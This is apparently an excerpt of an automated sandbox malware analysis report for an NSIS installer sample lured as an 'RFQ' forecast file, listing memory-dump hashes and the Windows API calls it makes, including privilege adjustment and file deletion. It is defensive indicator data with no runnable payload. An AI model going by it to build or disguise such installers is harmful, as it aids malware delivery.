                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ae0757f591dffce9e738710e0fa82ae8306774f92f1acc596a53422af5a743de
                                                                                                            • Instruction ID: 47472be36c91b212c8fb9cb0846ccffd95d20955b5c4266c8954bfeb0de08663
                                                                                                            • Opcode Fuzzy Hash: ae0757f591dffce9e738710e0fa82ae8306774f92f1acc596a53422af5a743de
                                                                                                            • Instruction Fuzzy Hash: C3F06434D01208CFDB04DFB9D8146EDBBB1EB8A301F50A429C414B3261DB355802CF55
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3d745a0fc2cefdec3d5e83a7158d760965b0959fd1ae7bf52564129b52839add
                                                                                                            • Instruction ID: a7155fc04977662aaaa195cbab9e4861527df2fcbf6688c310ee3c8ece6b16bf
                                                                                                            • Opcode Fuzzy Hash: 3d745a0fc2cefdec3d5e83a7158d760965b0959fd1ae7bf52564129b52839add
                                                                                                            • Instruction Fuzzy Hash: FAF0F431E04224ABDB109B68C9007AF7FB1FB84310F00552AD50457640DB31A546CFD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 79a67f76cd7007c03bdd570370b41203f4a9db17fac0706c95c1522dff4554da
                                                                                                            • Instruction ID: 21ba9d9492d19ce3ab65ffcabdb200282aea47db9122cfed0ac95cb99ab761f9
                                                                                                            • Opcode Fuzzy Hash: 79a67f76cd7007c03bdd570370b41203f4a9db17fac0706c95c1522dff4554da
                                                                                                            • Instruction Fuzzy Hash: F6F027203083551FD306627D1851A6B6FEEDBC6395B144476EA01DB282CE50DC4697F2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3242c0bd1d26109609505d774a8dc214c8cac43042592a12fd8ec9c864b64aa6
                                                                                                            • Instruction ID: 3712d0870f0da482d86f533e8976f1fe6df19fd45354f392b86bdbe24eef8b5a
                                                                                                            • Opcode Fuzzy Hash: 3242c0bd1d26109609505d774a8dc214c8cac43042592a12fd8ec9c864b64aa6
                                                                                                            • Instruction Fuzzy Hash: 21F0A0A031032527E20966AE5858B2F6E9AEBC5796F100836E705D6280DE90DC460BF2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9abb1038e3b2697fc8e543f04e5f9faa1abeefbf4fec6f3cea264612e3f05a2c
                                                                                                            • Instruction ID: 464f0b5c9dd81cc9815f9a91bc1d4af3ffa58661746b2f877944878aa474b90b
                                                                                                            • Opcode Fuzzy Hash: 9abb1038e3b2697fc8e543f04e5f9faa1abeefbf4fec6f3cea264612e3f05a2c
                                                                                                            • Instruction Fuzzy Hash: D0F0F230419F82AFE7012B30ACBC26A7F70FF0B313B856D95E05A86072CB794448CB11
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bffdb1ab76a555e9a2258bcd2043051e39f85e4910a0ff919e50ccf626c296fe
                                                                                                            • Instruction ID: 4eb33f609b749093092df8e66a6d6f4de9e44dd113c0affa3c07d5331b3ec55b
                                                                                                            • Opcode Fuzzy Hash: bffdb1ab76a555e9a2258bcd2043051e39f85e4910a0ff919e50ccf626c296fe
                                                                                                            • Instruction Fuzzy Hash: B9F03074D06204DBDB48DFB4E5486DC7BB0EB45301F5050B9D519A7360EB358E46DF40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e27fa519a24041f32903a4abd54ce7952e5bca126ec2b8f43d45a140a28f6d20
                                                                                                            • Instruction ID: e90c17fb2c888e5a81af7fdb94c6663b05ac01ac7b701fec6623bfe9029b44ac
                                                                                                            • Opcode Fuzzy Hash: e27fa519a24041f32903a4abd54ce7952e5bca126ec2b8f43d45a140a28f6d20
                                                                                                            • Instruction Fuzzy Hash: D8E092319113568EC7029FB0D8044EDBB30EE83710B0142A7D0546B050EB30194EC762
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a150e6ff6521ddd03d262a1fcba65abea950ec9491ebe4d1aa7dc66e506a4554
                                                                                                            • Instruction ID: cfc0e616f8e702d1160722b07164daed687e78b6c97f8e68235be7c5602bb8b1
                                                                                                            • Opcode Fuzzy Hash: a150e6ff6521ddd03d262a1fcba65abea950ec9491ebe4d1aa7dc66e506a4554
                                                                                                            • Instruction Fuzzy Hash: DFE06D34D05208DBC708DFB8D5086DCBBB4EB49301F6080B99805A3320E7304A82CB40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: fe821386d9c35f39ad976d4b13b07c9f3d31c62276f5c60d4141c5eda0bfdacd
                                                                                                            • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                                                            • Opcode Fuzzy Hash: fe821386d9c35f39ad976d4b13b07c9f3d31c62276f5c60d4141c5eda0bfdacd
                                                                                                            • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 61d652903f6b29e97b1f694640421813c6e1032bd668d22e8fa4bc43a2b92dee
                                                                                                            • Instruction ID: acab0fa4cb5ac254634be512a54079b2511442690a10b50a8f8725513fbda36d
                                                                                                            • Opcode Fuzzy Hash: 61d652903f6b29e97b1f694640421813c6e1032bd668d22e8fa4bc43a2b92dee
                                                                                                            • Instruction Fuzzy Hash: 60E0C23110C3A44EC602A735FC945893B7A9B81202F008995E40A1F56FDE752B8A9BA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: faa25d40f4748f57f92ae8f42664e6221b2cfff946a194dceed954fb1bcfd884
                                                                                                            • Instruction ID: 0a2f63e43dcb0fb062ab8095fd8e014b960685c8ebdfb1e04b03b2348c96506b
                                                                                                            • Opcode Fuzzy Hash: faa25d40f4748f57f92ae8f42664e6221b2cfff946a194dceed954fb1bcfd884
                                                                                                            • Instruction Fuzzy Hash: ACD02BB18051099FC304CB94C819BE8F73CD743301F0000FC941933340D7705D11D655
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1cc3345c9ee7a7b182aad3ff23b3fe830b5b4b2bb715e8e89d7031cacd8f34f2
                                                                                                            • Instruction ID: a1b5de0f5ed4ce95caff0a5781950bd49c8478c9c2917fbfba2598411e7c3152
                                                                                                            • Opcode Fuzzy Hash: 1cc3345c9ee7a7b182aad3ff23b3fe830b5b4b2bb715e8e89d7031cacd8f34f2
                                                                                                            • Instruction Fuzzy Hash: A7D0A9321AC2C44FDB128730ACA18C47FB45F13210B5552CAD886CBAB3C1A2A829CB01
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5828ce42bdc5de0d6d765ab1d505d683e374f42c3b2eaccc68d17ffeebe9bbf2
                                                                                                            • Instruction ID: a1a7a8b0179d5778e812c62cd1b3151de51c67c8f339f3b318bf5005a3a8bad1
                                                                                                            • Opcode Fuzzy Hash: 5828ce42bdc5de0d6d765ab1d505d683e374f42c3b2eaccc68d17ffeebe9bbf2
                                                                                                            • Instruction Fuzzy Hash: 3AD0A73110E7A00FD713932C7C24C4A7FB04CC756131A4AEBF058C70E29A840A4A8B8B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3b3976dcedee0f5dbccc8f23ef664021b65dc96a821bf3d781703073c50cbac0
                                                                                                            • Instruction ID: 3e2e5715061c49c4c5e8f0a6fbd74348cebca5068298ba149b43d7d5eec2bea0
                                                                                                            • Opcode Fuzzy Hash: 3b3976dcedee0f5dbccc8f23ef664021b65dc96a821bf3d781703073c50cbac0
                                                                                                            • Instruction Fuzzy Hash: 56D0673AB40018AFCB049F98EC808DDF776FB98221B448116F915A3261C6319965DB50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 99a44fe24f2112f6c9567bc2d54f6f101b84e9bafe31f8cc71b5bca420be92cb
                                                                                                            • Instruction ID: 0a408954101aa98721f48759cb2f3b59916d6dff169502fe3c9bc71c490b3f9b
                                                                                                            • Opcode Fuzzy Hash: 99a44fe24f2112f6c9567bc2d54f6f101b84e9bafe31f8cc71b5bca420be92cb
                                                                                                            • Instruction Fuzzy Hash: B3C01232215631075615A22DB85089E5E95CEE53523109E67B40C831045E5059474AC5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 872a2aa8578919438a219bd942b3367be5965c546cf6bd06fbf7fbf63565e53d
                                                                                                            • Instruction ID: 621d16767e9b51c08ba84f2fecccf092f7f21d3cc48c26f3ffd031db34f9e773
                                                                                                            • Opcode Fuzzy Hash: 872a2aa8578919438a219bd942b3367be5965c546cf6bd06fbf7fbf63565e53d
                                                                                                            • Instruction Fuzzy Hash: 5BD0A9B0801208ABC304DFA4D809BE9B778EB43302F4000A8A408232109BB00D00DA98
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 989f58890d2d710883977e1c76d8fb2f73fffec9d98dfce324b192ad52fda340
                                                                                                            • Instruction ID: 68ca94c178928fd82368356e8679f35429ce9ee905bb38e094b0a59f97ecd775
                                                                                                            • Opcode Fuzzy Hash: 989f58890d2d710883977e1c76d8fb2f73fffec9d98dfce324b192ad52fda340
                                                                                                            • Instruction Fuzzy Hash: ADC08C74041E098BE2042F50BC2CB79BBB8F707317FC82E10E00C028308BB84414CA44
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0d071ad97b7e5b094d8f899e6f77c7996d38e48f1d00f213a6b0ce936d4f619d
                                                                                                            • Instruction ID: f71b62bb93db92491cdddcfc757c0a681bba013bbbfd375fa9ef23308b994791
                                                                                                            • Opcode Fuzzy Hash: 0d071ad97b7e5b094d8f899e6f77c7996d38e48f1d00f213a6b0ce936d4f619d
                                                                                                            • Instruction Fuzzy Hash: D6C04C302787048FE240AA5DD984A553BACEF86B09F6058E1F5589B665DB62FC044F45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 190c13e741bfda495a608f6f862d6f5ce902c945f52c93729d2417b3cec9c4f2
                                                                                                            • Instruction ID: 6e4f4279d17b8d4f2f14a370ae343446af0fa662adb3e276827634e2c14cc2d2
                                                                                                            • Opcode Fuzzy Hash: 190c13e741bfda495a608f6f862d6f5ce902c945f52c93729d2417b3cec9c4f2
                                                                                                            • Instruction Fuzzy Hash: D3C012301143284EC505E765EC85559776EA780202B408910B00A1656EDFB5198B5BD0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bb7d6539a473ad240e7469636d7bb6fd9e6baa649281cbae380551c3d01ca966
                                                                                                            • Instruction ID: f4e859690ef161811c7475360a5062fa99e3984e31b4fe75fade96da3f8bc4a6
                                                                                                            • Opcode Fuzzy Hash: bb7d6539a473ad240e7469636d7bb6fd9e6baa649281cbae380551c3d01ca966
                                                                                                            • Instruction Fuzzy Hash: 8EC04C7061A7C08ECF06977595649453FB0AF0720130A08DFD055CB4B3C925A458D712
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 795d033847f836fb40512d74a1a825e7fd12c0e1066fb2a093793cd61091f009
                                                                                                            • Instruction ID: a760b4973a14160105829a9406b982b14a3b752125215f10bad6f5bbdb5db6d0
                                                                                                            • Opcode Fuzzy Hash: 795d033847f836fb40512d74a1a825e7fd12c0e1066fb2a093793cd61091f009
                                                                                                            • Instruction Fuzzy Hash: 84A0223C30000283C308EF20E000C0FE3832FE0A08B02C02C0008020E08820CC028023
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32 ref: 004032C2
                                                                                                            • GetVersion.KERNEL32 ref: 004032C8
                                                                                                            • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                            • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                            • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,0043F000,00000000), ref: 00403363
                                                                                                            • CharNextW.USER32(00000000,0043F000,00000020), ref: 0040338A
                                                                                                              • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                              • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                            • GetTempPathW.KERNEL32(00000400,00441800), ref: 004034C5
                                                                                                            • GetWindowsDirectoryW.KERNEL32(00441800,000003FB), ref: 004034D6
                                                                                                            • lstrcatW.KERNEL32(00441800,\Temp), ref: 004034E2
                                                                                                            • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp), ref: 004034F6
                                                                                                            • lstrcatW.KERNEL32(00441800,Low), ref: 004034FE
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low), ref: 0040350F
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,00441800), ref: 00403517
                                                                                                            • DeleteFileW.KERNEL32(00441000), ref: 0040352B
                                                                                                              • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                            • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                            • ExitProcess.KERNEL32 ref: 00403618
                                                                                                            • lstrcatW.KERNEL32(00441800,~nsu,0043F000,00000000,?), ref: 0040362B
                                                                                                            • lstrcatW.KERNEL32(00441800,0040A26C,00441800,~nsu,0043F000,00000000,?), ref: 0040363A
                                                                                                            • lstrcatW.KERNEL32(00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403645
                                                                                                            • lstrcmpiW.KERNEL32(00441800,00440800,00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403651
                                                                                                            • SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 0040366D
                                                                                                            • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                            • CopyFileW.KERNEL32(00442800,0042AA28,00000001), ref: 004036DB
                                                                                                            • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                            • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                            • String ID: .tmp$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                            • API String ID: 3586999533-3972089011
                                                                                                            • Opcode ID: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                            • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                            • Opcode Fuzzy Hash: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                            • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                            • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                            • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970240288.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970262288.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2970290733.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                            • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                            • Opcode Fuzzy Hash: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                            • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(?,?,74DF3420,00441800,0043F000), ref: 0040586F
                                                                                                            • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058B7
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058DA
                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058E0
                                                                                                            • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058F0
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970218744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2970180022.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
